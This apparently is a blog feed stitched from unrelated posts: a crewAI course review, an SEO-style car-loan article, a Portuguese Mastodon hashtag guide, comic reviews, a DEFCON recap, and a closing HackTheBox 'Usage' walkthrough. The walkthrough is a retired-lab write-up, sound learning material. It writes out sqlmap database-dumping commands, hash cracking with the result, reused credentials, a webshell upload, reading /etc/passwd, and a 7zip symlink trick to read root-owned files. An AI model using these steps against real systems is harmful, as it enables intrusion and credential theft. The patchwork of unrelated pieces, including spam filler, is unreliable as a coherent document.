Reader

I’ve been a “dabbler” with crewAI for a while now, having come across it in March of 2024 and tinkering when I have some time. I love the idea of task-based LLM actions that are specific enough that you can use lower cost but specifically-trained models for the tasks, even running those models on your own hardware. A few weeks back, my team at work used CrewAI for a hackathon in an effort to automate an onerous process, and it came out pretty well!

So, when I saw that they have a couple official training videos on a new e-learning platform called DeepLearning.ai, I figured I’d check them out. #CrewAI is evolving rapidly, and the some of the notes I’ve taken over the past 8 months aren’t even applicable anymore, so I figured this was a great way to level-set and fill in gaps in my knowledge.

I’m not going to describe CrewAI here, other than it’s a framework for easily building multi-agent teams and requires little to no coding experience. How CrewAI works is well-explained in the first fifteen minutes of the course, so at least listen to that part!

About the Course

The course, Multi AI Agent Systems with crewAI, follows a flow familiar to anyone that has taken online courses, and is taught by the creator of crewAI, João Moura. The lessons, ranging from a minute to 18 minutes, are a mix of descriptive lecture and hands-on coding. For the lessons where coding is involved, the window handily split-screens and on one side is an iPython notebook environment with the code pre-populated, so you can work through it as João explains what the code does.

You can also get an indication of the course and CrewAI by checking out my crewAI experimentation repo on GitHub.

Target Audience Analysis

Professionals working in project management, artificial intelligence, and team leadership can greatly enhance their skills in constructing multi-agent teams. Those keen on optimizing team performance, utilizing state-of-the-art technologies for collaborative work, and streamlining task execution processes would discover value in enrolling in specialized online classes tailored to augment their proficiency in this realm. Addressing prevalent challenges like steering diverse teams, accomplishing project goals in intricate scenarios, and keeping pace with evolving team dynamics is indispensable for professionals aiming to excel in their respective roles.

Content Outline

Introduction to Multi-Agent Teams

Familiarizing with the basics of multi-agent teams and their significance in managing complex tasks effectively.

Importance of Building Multi-Agent Teams for Complex Tasks

Unveiling the reasons why seamless collaboration among agents is crucial for successful task fulfillment.

Strategies for Creating Effective Multi-Agent Teams

Scrutinizing established methodologies for assembling and overseeing high-performing multi-agent teams.

Multi-Agent Crew Performance Examples

The bulk of the course is working through five clear examples of building multi-agent systems with CrewAI. The result is a set of real-world instances where multi-agent teams can perform and achieve remarkable results across diverse problems.

write_article

The first example is super simple: take a task you might do with a single prompt with an #LLM chatbot, such as chatGPT, and have it performed by multple agents, each with their own persona. This performs no research and the output is purely from the LLM, making it an easy entrypoint for anyone. (Hint: I had it write an article about taking an online course for developing multi-agent teams, and even incorporated a bit of it into this.)     – this one required an update from the training to run on the latest version of crewai.     – older versions of crewai used an integer for the verbose declaration, and if you are running the latest, you need to change that to a binary, e.g. True.

This example is definitely one you’ll want to revisit after you learn how to use and assign tools to your agents in the following lessons.

customer_support

This creates a customer support agent that can answer questions about a specific product or service. It does this by accessing the URL with the support documentation.

customer_outreach

This example creates some marketing lead material to reach out to a specific company that is a potential customer or partner for a second, i.e. “your” company.

event_planning

This example uses multiple agents to research, identify, create the logistics, and then create some marketing material for an event. It takes in parameters like city, size, and budget in order to find a viable venue. – I believe it was this one where I had to fiddle with the asynchronicity of the agents, since I understand that CrewAI needs to have the last agent to perform a task be performing that itself. I could have that wrong, but I had to change that to make mine work.

This is actually a super-cool example, but I found that the LLMs did not adhere to the parameters, often getting venues too small or ignoring the input I would provide while they were performing their tasks. That’s to be expected, however, and I think experimentation is the name of the game when it comes to building these systems.

resume_builder

The final one was to have the agents create bespoke resumes, based upon the job one is applying for. As opposed to the event planning exercise, the output on this one was very good, and I was impressed with how well it could craft a resume for the specific job, as well as anticipate some of the interview questions and provide some hints for how to answer them.

Conclusion

This course provides a clear and thorough introduction to crewAI, bringing the attendees to an intermediate level of being able to use the framework. By immersing themselves in the intricacies of multi-agent team dynamics, professionals can acquire the requisite knowledge and proficiency to thrive in today's collaborative work settings. Embracing online classes tailored to address the subtleties of forming effective multi-agent teams represents a proactive stride towards honing essential skills and keeping abreast in the ever-dynamic professional sphere.

• basic intro instructions for whisper transcription application – link
• basic intro instructions for using yt-dlp to download media – link

Começando... Espero entender logo tudo!

Please stand by for unimportant messages.

Tips for Getting the Best Car Loan Rates in British Columbia

Getting the best BC auto loan rate might improve your finances. With changing interest rates and loan possibilities, it's important to know how to receive the best terms. This detailed guide will help you negotiate BC automobile financing and get the best vehicle loan rates.

1. Knowing BC Car Finance

Before applying for a vehicle loan, you must understand BC auto financing. Knowing the sorts of vehicle loans, interest rate considerations, and competing financial institutions is necessary. British Columbia vehicle finance includes online, credit union, and bank loans. Each option has benefits and downsides, and rates depend on credit history, loan amount, and term.

2. Improve Credit Score

Credit score is crucial to getting a cheap vehicle loan rate. Lenders evaluate creditworthiness and interest rates based on credit scores. Lower interest rates are characteristic of better credit scores.

3. BC Auto Loan Rates Compare

Compare BC auto loan rates from several lenders to get the best deals. Different lenders and financial profiles charge different interest rates. Compare rates from banks, credit unions, and internet lenders using web tools. Ask lenders about their rates and any specials or reductions.

4. Get BC Auto Loan Pre-Approval

Pre-approval for a BC auto loans may speed up car buying. Your financial information is reviewed by a lender to establish your maximum loan amount and interest rate before you start car shopping. Pre-approval defines your budget and attracts dealerships. It demonstrates you're serious and can acquire financing, providing you negotiation leverage.

5. Consider Loan Term

The period of your auto loan affects your monthly payments and total interest. Longer loan periods may cut monthly payments but increase interest payments. Consider your budget and financial objectives when choosing a loan term. If you can afford larger monthly payments, a shorter loan period may save you money. If you require lower payments, a longer term may be easier but cost more.

6. Negotiate Car Loan Terms

Never be scared to negotiate your BC auto finance. Many lenders may provide better rates if you have strong credit and are pre-approved. Interest rate, loan period, and fees are negotiable. Being proactive and talking to lenders may get you a better rate or loan terms.

7. Can I Extend My Car Loan?

If you want a car loan extension, then you should examine the advantages and downsides first. Extended terms may lower monthly payments but increase interest charges throughout the loan's life. Discuss loan term extensions with your lender to determine their influence on loan expenses. Make sure the new terms fit your financial objectives and don't cause debt.

8. Read Your Loan Agreement Carefully

Before signing a vehicle loan, read the terms. Consider the interest rate, loan length, payment plan, and fees and penalties. Understanding your loan agreement helps you prevent surprises and hidden fees. Ask your lender for clarification if needed.

Conclusion

The finest car loan rates in British Columbia need preparation and thought. Understanding for BC auto loan approved, boosting your credit score, comparing rates, and negotiating conditions may improve your loan prospects. Check the loan term and agreement to make sure it fits your financial objectives. You can better understand the vehicle loan process and locate the best financing plan with these advices.

• Salt's GoFundMe: https://www.gofundme.com/f/cgcgn5-camp-fundraiser
• Anti-SAlt Posters: https://drive.proton.me/urls/55JRBZ0BBW#JuYQblTc5jab
• De-recruitment handout: https://docs.google.com/document/d/1WD-lbyFWccThT4SSSztWp7yV2gvGtrgMZFzHEuv4rag/edit
• General explainer: https://docs.google.com/document/d/1L8EFM4XRMSxH0Lpn_Zwtc91x41kjUWksdxguhPvEm3s/edit
• QUT and UQU deregistration petition: https://www.change.org/p/protect-students-from-socialist-alternative-s-abusive-practices

Para quem inicia no Mastodon aqui vão algumas explicações sobre a importância que as hashtags possuem.

A hashtag é uma palavra ou frase que, uma vez precedida pelo símbolo de cerquilha (#), sem espaços, transforma-se em uma etiqueta ou rótulo, na forma de um hiperlink que leva para uma página com outras publicações relacionadas ao mesmo tema.

No Mastodon, bem como em toda federação ActivityPub, a compreensão de suas funcionalidades é essencial, inclusive por questões de acessibilidade.

Barra de pesquisa do Mastodon

Por motivos técnicos de privacidade o Mastodon foi inicialmente desenhado para permitir apenas as seguintes formas de busca:

1. Por hashtags (#exemplo);
2. Pessoas (@nomedousuário@domínio);
3. URL (links) de perfis e de posts;

Atualmente o mastodon permite a busca por texto simples, mas para que as postagens dos usuários se tornem visíveis é necessário que optem por isso (então se você quer que o texto de suas postagens públicas sejam vistos na busca, acesse as configurações de sua conta e marque para permitir essa opção).

A pesquisa por hashtags é precisa e abrange todas as pessoas de instâncias federadas à sua, independentemente de você seguir a pessoa ou não, e sem a influência de qualquer algoritmo.

Note também que você pode seguir uma hashtag, caso seja um assunto do seu interesse, clicando no botão destacado acima. Quando você segue uma hashtag, todas as postagens das pessoas pertencentes à sua instância ou das instâncias federadas à sua, independentemente ou não de você segui-las, que contenham essa hashtag, serão exibidas na sua página inicial.

Usando Hashtags e Noções de Respeito

As hashtags, portanto, devem ter um # no início e não podem ter alguns caracteres especiais no início e no meio (ponto, espaço, arroba, asterisco, etc.).

O sistema de hashtags atualmente não diferencia a acentuação e alguns caracteres especiais que são permitidos, como o (ç), por exemplo, de modo que as hashtags #política e #politica (sem acento no i) ou #paçoca e #pacoca, são unificadas pela busca da plataforma.

Se você deseja pesquisar uma frase, digite tudo como uma palavra, como #CatsOfMastodon.

Se você deseja que sua postagem seja encontrada com mais facilidade nas pesquisas, inclua muitas hashtags relevantes. Não há problema em usar muitas dessas etiquetas, as pessoas entendem que são necessárias nesse tipo de sistema de busca.

Ademais, o uso das Hashtags devem respeitar uma relevante questão de acessibilidade. Existem muitos usuários cegos no Mastodon e no Fediverso que usam leitores de tela para converter texto em áudio.

Portanto, ao postar hashtags, existe uma formatação correta, que consiste no uso do método chamado de CamelCase (onde cada palavra começa com uma letra maiúscula), por exemplo #CatsOfMastodon em vez de #catsofmastodon. As letras maiúsculas permitem que os aplicativos de leitura de tela separem as palavras corretamente e leiam a hashtag em voz alta corretamente.

Aliás, é importante mencionar uma hashtag super relevante do universo Mastodon, a famosa #Alt4Me.

Quando uma imagem de uma postagem não possui descrição e há a hashtag #Alt4Me adicionada a ela pela pessoa que a postou, isso pode significar que o autor da postagem não consegue adicionar uma descrição (por exemplo, devido a uma deficiência), mas esteja ciente de que é necessário, então ele adicionou a etiqueta preventivamente.

A hashtag #Alt4Me geralmente significa que uma pessoa cega quer que você escreva uma descrição da imagem. Responda à postagem com a hashtag e forneça a descrição.

Note que a sistemática de hashtags não faz distinção se as palavras estão em caixa alta ou caixa baixa, portanto, #CatsOfMastodon ou #catsofmastodon são exatamente a mesma coisa para fins de pesquisa, de modo que o único diferencial em seguir o “CamelCase” está em propiciar um ambiente mais acessível às pessoas cegas, que deve ser respeitado.

Hashtags e filtros

Outra funcionalidade importante das hashtags é que elas permitem às pessoas que não querem ver postagens relacionadas a determinado assunto ou tema, que utilizem um filtro cuja função é tornar esses posts invisíveis, sem a necessidade de silenciar, bloquear ou deixar de seguir um usuário.

Ao utilizar o Mastodon é muito importante que você compreenda que se trata de uma rede social que recebe e acolhe pessoas que vieram de outras redes sociais, de propriedade capitalista, buscando um ambiente menos tóxico.

Sendo assim, existem temas que devem ser rotulados pelas hashtags não só para facilitar que pessoas interessadas os encontrem, mas também para permitir que pessoas que se incomodam com eles os filtrem.

Vamos usar como exemplo o caso do futebol. Eu adoro o esporte, tenho meu time de coração (Flamengo) mas convenhamos que há pessoas que não veem a menor graça e, ademais, existe uma “cultura do futebol” em nosso País, que é extremamente problemática, incluindo violência entre torcidas, machismo, homofobia e racismo.

Não custa nada, portanto, incluir a hashtag #futebol em suas postagens sobre o tema, ou outras em temas sensíveis, como #PolíticaPartidária.

Evidentemente você também tem a ferramenta dos avisos de conteúdo, mas acho a hashtag mais eficiente, pelo fato de permitir que os interessados encontrem a postagem, bem como os desinteressados a tornem completamente invisível sem sequer a necessidade de ler o aviso de conteúdo sobre o tema.

Aqui explico, portanto, como filtrar as hashtags.

No menu lateral vá em Preferências > Filtros e depois clique em Adicionar Filtro. Abrirá a seguinte tela:

O título do filtro, indicado pela seta vermelha, como o nome diz, é apenas um título, para te ajudar a encontrar o filtro em sua lista de filtros.

A seta verde indica o tempo de validade do filtro (que pode ser permanente, como visto no exemplo). Às vezes você não se importa em visualizar algo sobre futebol ou política, mas durante os jogos ou durante o período eleitoral, você não quer ser inundado de postagens sobre o tema, de modo que pode criar um filtro com duração provisória.

Em “Contextos do filtro” (retângulo rosa) você escolhe onde o filtro vai exercer sua função de ocultar mensagens, no exemplo dado marquei a opção de ocultar as postagens da página inicial e das linhas públicas, mas você pode fazer uma filtragem mais severa, se preferir, filtrando perfis de usuário e conversas.

Em “Filter action” você pode escolher se a postagem filtrada vai ser indicada para você com um aviso ou se ela desaparecerá completamente sem qualquer notificação, como se a postagem jamais tivesse existido.

Em “Palavra-chave ou frase”, indicado pela seta amarela na parte de baixo, você digita a hashtag que quer filtrar.

Após Salvar Novo Filtro, conforme o botão indicado pela seta azul, você não irá visualizar qualquer postagem em sua linha do tempo ou nas linhas públicas que contenham a hashtag selecionada (no caso do nosso exemplo: #futebol).

Você pode adicionar quantos filtros desejar.

Essas eram as minhas considerações a respeito das hashtags. Espero que aproveitem bastante e criem muitas hashtags interessantes no universo brasileiro do Mastodon.

#Hashtag #MastoDicas #Mastodon #Tutorial

I think I'm overthinking this. I think I'll follow the instructions for Secure Boot for the Linux Surface project and see how that goes.

The GH project's wiki references following steps outlined in the ArchWiki.

Additionally, I came across the following sources:

• Super User thread from Stack Exchange
• GitHub gist from July 2022
• A blog post from January 2022

I haven't been able to sit down and try this — but expect that this worked if I don't come back to follow up.

About three days ago, I was reading federal government online sources about online job scams.

There is resource page from the FTC and another FTC page to report online scams, as well as the the Internet Crime Complaint Center (IC3) page from the FBI.

Conclusion

Most traditional jobs don't advertise on Craigslist. I almost got burned, but luckily I smoked this scam out before I could even apply for it.

The particular one I was looking at struck me as strange, as it has been the only Craigslist posting (of any type) that didn't use Craigslist's prviate e-mail relay/address option. Due to this, I kept looking at the e-mail address (as it was a Yahoo e-mail address, instead of from an official e-mail address from a real American healthcare corporation) until I realized I was looking at a scam — it was very much like looking at a very well camoflauged animal for a long time before spotting it.

An offer that's “too good to be true” doesn't have to be hyperbolically exaggerated to the point of being comical and super obvious — it can also be a toned-down, realistic decoy.

Also, it is a good rule of thumb to cross-reference and check if the same online job listing you've stumbled upon on an aggregate site (such as Craigslist or Indeed) can be found on a better first-party source, such as the company website.

eBay is sometimes tedious to deal with. I use the site to buy electronic parts for repair, but some aspects of the site are annoying to deal with.

For example, if you use a password manager, then you should wait a few seconds (at least 5 seconds, if I had to pick name a number) before submitting your password. (Then, you will be prompted with an hCaptcha, if you are using a VPN; followed by an SMS message for 2FA.)

I received an error message, identical to that described in an EcommerceBytes article from January 2021. I think this was because I tried to log in very quickly, assisted by KeePassXC.

This YouTube video from August 2023 also shows the rate limiting.

This is sort of annoying, as checking my order status on eBay is currently my only way to check the shipping status of orders, since even the U.S. Postal Service completely blocks VPNs (at least Mullvad VPN) when I tried doing this about two days ago.

There is a site called Read Comic Online, which I first saw when I on a fellow student's laptop during my last year of undergraduate studies.

(This site is definitely violating copyright, but on the other hand there is probably no pragmatic way I could buy physical copies of any of the Stranger Things comics when I started reading those, except in collected book versions; though I'd have to go to the library to read those. Also, I have yet to explore in-person comic book stores.)

In early 2024, I was browsing the site when I discovered the webcomic Kill Six Billion Demons (or KSBD).

Fair warning: if you thought that reading a Boruto chapter monthly (or a Naruto manga chapter back during its publication run) was painful, then the anticipation of waitng for each page of KSBD to be released might be too much for you.

Anyways, I somehow started reading the middle of the series online and quickly read through all the books available on Read Comic Online. As some context: it has been a while since the series has collected the later books into print form with Image Comics, so you can get a lot further into the story by reading the webcomic.

I was immediately hooked. But then I went to the actual KSBD website and realized I had no idea what was happening in the story, as the webcomic site is much further along than the completed print books avaialbe on Read Comic Online. So, I caught up with the story, as of early 2024.

I was initially shocked at the outer appearance of protagonist Allison when I first opened the KSBD webcomic site. Initially, she was drawn in a way that made be believe she was a villian, which was not the case and at first confused me. However, after catching up with the story, I understand how Allison came to her current state in the story.

I just wanted to talk about KSBD, as there is not much (meta-)explanatory material on KSBD generally online, except for rather obscure places — such as the comments under each page of KSBD.

Critiques

• The venue was too bright. Chillout rooms and talk tracks could have used a dimmer.
• Speaking of the Chillout room, it was somewhat disappointing. (I’m talking about Chillout 2, as Chillout 1 felt like a giant hospital waiting room). I like a cavernous, dim, and ambient room for, you know, chilling out. #SomaFM was over in the hallway, the Chillout room had a live stage, and it was overall pretty small.

“Best-ofs”

These are the best things I personally saw or were close to. There’s so much going on that this just represents the best stuff I saw in my fractional DEFCON experience.

• Best thing I learned: Gained a good bit of familiarity with InspectAI at the AI Village as a part of their CTF.
• Best Talk: “Librarian in Broad Daylight: Fighting back against ever encroaching capitalism” by the Cyberpunk Librarian in the War Stories track.
• Best Rant: Cory Doctorow on #enshittification
• Best Tool or Technique: “MySQL honeypot that drops shells”
• Best Research: “Watchers being watched: Exploiting the Surveillance System” in which the researchers exploited 4 different surveillance systems.
• Best Real-World Impact: “Bastardo Grande: Hunting the Largest Black Market Bike Fence In The World” by Bryan Hance. Talk not up yet, see the related Wired article
• Best Contest: There’s too many, but I loved the idea of Sn4ck3r, the machine that vends real items for captured flags.
• Best Party: the 503 Party, of course!
• Best Entertainment: DJ Jackalope brought an awesome set after Hacker Jeopardy. (and Skittish and Bus did a great job warming up the crowd just before)
• Biggest Drama: the badge
• Best Village: The Packet Hacking village due to the supreme DEFCON-y ambience and the well-run workshops they provided to people of all skill levels

Observations & Random Points

1. I probably haven’t been to a main track talk in person for over 6 years. I decided to go to a few of them and really enjoyed the atmosphere. I’ll have to remember to put at least 2 on the agenda each year going forward.
2. BlueTeam Village got a much larger space this year. I’m happy to see that, as they were nearly impossible to get into over at the Flamingo in recent years. BTV is doing good work and people should be able to experience it.
3. There were a lot of contests.
4. The Car-hacking village really brings it. They had a semi truck rig, a Rivian, and they gave away a Tesla. Well done, and my only ask is that we make it easier for people & mechanics to jail break their cars when the companies John Deere-ify them.

Next #DEFCON will be held Aug 7-10, 2025 at the LVCC. I hope to see you there!

East of West is probably the best self-contained story I've read recently in the general genre of comic series, graphic novel, and manga. It's longer than one collected book, yet isn't a series that feels like it's going on forever, such as Naruto or Boruto.

I will say that the very of East of West seems to be relatively anticlimactic compared to how it starts, yet it is still better than the ending of the original Matrix film trilogy.

Regardless, East of West still ends way better than The Empty Man, which I felt started really well but then ended in a rather mediocre fashion — much like the Matrix trilogy.

I sort of wished that production of the comic series Godslap, which was co-created by MoistCr1TiKaL, would release more frequently, as well as comic series of Outlast: The Murkoff Account and the vampire comic series Sucker.

(Though, to be fair, the continuation of the Murkoff Outlast comic that I am invested in can't finish anytime soon, as the game Outlast III hasn't been released yet.)

Apparently, as of November 2023, the third and final volume of Sucker is in production. I really liked this one because it had some rather sharp social commentary on Big Pharma... maybe too sharp, given that Volume 2 was released on March 2020, when the COVID-19 pandemic really started in the US.

(The following links are probably NSFW-risky links, though not completely explicit, for the Sucker comic: Volume 1 and Volume 2 are published by Polite Strangers. This series was originally crowdfunded on Kickstarter and IndieGoGo — I was able to find these links despite some difficulty.)

Conclusion

From my experiences, I think most time reading comic books and graphic novels should be done alone. It's how I discovered all of these unique stories that almost no one in mainstream media outlets (both in TV and film) would even consider exploring. It's not just online ARGs, analog horror, and SCP Foundation-esque entries that have more wildly creative ideas than even the most unfiltered indie film and TV projects.

I think some of my formative time spent in public libraries was reading graphic novels alone. You learn by osmosis how to form your own opinion regarding media literacy.

I would love to see The Private Eye comic adapted into a A24-like two-part miniseries, as this finished serialization by December 2015 and is really prescient in a post-Snowden era and the post-COVID technology chilling. The screenplay and basic storyboard is at least 50% towards MVP of a screenplay script, if you think about it.

Also, adapting Xombi Volume 2 as a stand-alone three-part miniseries for the character Xombi would be my highest personal cinematic adaptation goal. I think DC could consider exploring some “experimental” media entries, similar to that of the 2022 Werewolf by Night film special from Marvel; as much of its DC cinematic and television entries are pretty disconnected already.

I mean, Spider-Man: Homecoming completely avoided redoing Tom Holland's being bitten by the spider and yet the film did just fine. So, we wouldn't have to trudge through David Kim's origin story. If your story is good, then it's good. A superhero-like character doesn't always have to be an origin story to have a compelling story.

Lastly, there is some music (just two tracks) that was created for East of West, which is available on Bandcamp at a cost of “name your price” (including free).

Really random and funny postscript

Speaking of Bandcamp: Nathan Barnatt, the IRL actor who plays the character Dad, also has a Bandcamp for all of the original music and songs created for the Dad series.

Intro

Usage is a retired easy rated box on hackthebox. It features blind SQL injection, the exploitation of a vulnerable laravel plugin, hash cracking and wildcard spares.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The webserver redirects to usage.htb which I add to /etc/hosts. I then started a subdomain enumeration using ffuf.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I start having a look at the base domain. I tested the account creation form for some basic sql injection, mainly just inputting single quotes – nothing there. I then created an account and tested the /forgot-password endpoint for some basic injection techniques. Inputting a ' returns a 500 – Internal Server Error which made be believe to have found a blind SQL injection.

I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information: – Backend: MySQL > 5.0.12 – Blind Injectable – 8 Columns

Which is not that much but a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (This takes a while to run!).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables 

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin

Taking a look at the hashcat example hashes page or using a script like hashid shows, that it's a bcrypt hash.

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1 which I used to login into the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages which lead me to CVE-2023-24249.

I used Burp Suite to proxy my requests and just followed the PoC. I had to activate the Option Follow Redirects in the Repeater Tab. Using the uploaded webshell can be a bit tricky because theres a cleanup script running which deletes the shell.

I am now logged in as dash, which gains me the user flag. The file .monitrc kind of sticks out. Having a look at the file I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users on that box.

cat /etc/passwd | grep -e "$sh"

Another user is xander. I tried using the pillaged password to login as xander, which worked.

Executing sudo -l shows that xander is allowd to run exactly one binary as root. One function of this binary is backing up the website. It uses 7zip to do so, which I can exploit.

1. Create the file @root.txt in /var/www/html
2. Create a symlink ln -s -r /root/root.txt root.txt in /var/www/html
3. Execute the application. It will now output the root flag.